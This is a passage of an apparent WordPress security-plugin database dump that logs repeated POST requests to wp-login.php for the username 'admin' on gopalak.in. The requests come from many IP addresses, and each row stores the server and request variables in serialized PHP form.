_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746955706.8191769;s:12:\"REQUEST_TIME\";i:1746955706;}}','212.227.26.126',0,'2025-05-11 14:58:28','1970-01-01 00:00:00'),(95478,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39312\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.125.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746956130.6928999;s:12:\"REQUEST_TIME\";i:1746956130;}}','198.54.125.78',0,'2025-05-11 15:05:32','1970-01-01 00:00:00'),(95479,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58466\";s:11:\"REMOTE_ADDR\";s:14:\"47.243.188.167\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746956554.6474769;s:12:\"REQUEST_TIME\";i:1746956554;}}','47.243.188.167',0,'2025-05-11 15:12:36','1970-01-01 00:00:00'),(95480,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48604\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746956975.571723;s:12:\"REQUEST_TIME\";i:1746956975;}}','37.187.26.72',0,'2025-05-11 15:19:37','1970-01-01 00:00:00'),(95481,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51346\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746957393.5513611;s:12:\"REQUEST_TIME\";i:1746957393;}}','103.169.35.190',0,'2025-05-11 15:26:35','1970-01-01 00:00:00'),(95482,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41782\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746957812.1100099;s:12:\"REQUEST_TIME\";i:1746957812;}}','164.160.91.19',0,'2025-05-11 15:33:33','1970-01-01 00:00:00'),(95483,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50446\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.137.129\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746958224.4195149;s:12:\"REQUEST_TIME\";i:1746958224;}}','66.29.137.129',0,'2025-05-11 15:40:26','1970-01-01 00:00:00'),(95484,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53754\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746958641.7575541;s:12:\"REQUEST_TIME\";i:1746958641;}}','162.0.209.248',0,'2025-05-11 15:47:23','1970-01-01 00:00:00'),(95485,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"9080\";s:11:\"REMOTE_ADDR\";s:11:\"78.135.87.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746959053.61748;s:12:\"REQUEST_TIME\";i:1746959053;}}','78.135.87.2',0,'2025-05-11 15:54:15','1970-01-01 00:00:00'),(95486,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58700\";s:11:\"REMOTE_ADDR\";s:13:\"190.92.174.31\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746959456.520268;s:12:\"REQUEST_TIME\";i:1746959456;}}','190.92.174.31',0,'2025-05-11 16:00:58','1970-01-01 00:00:00'),(95487,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33678\";s:11:\"REMOTE_ADDR\";s:15:\"220.158.234.201\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746959853.2312059;s:12:\"REQUEST_TIME\";i:1746959853;}}','220.158.234.201',0,'2025-05-11 16:07:35','1970-01-01 00:00:00'),(95488,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 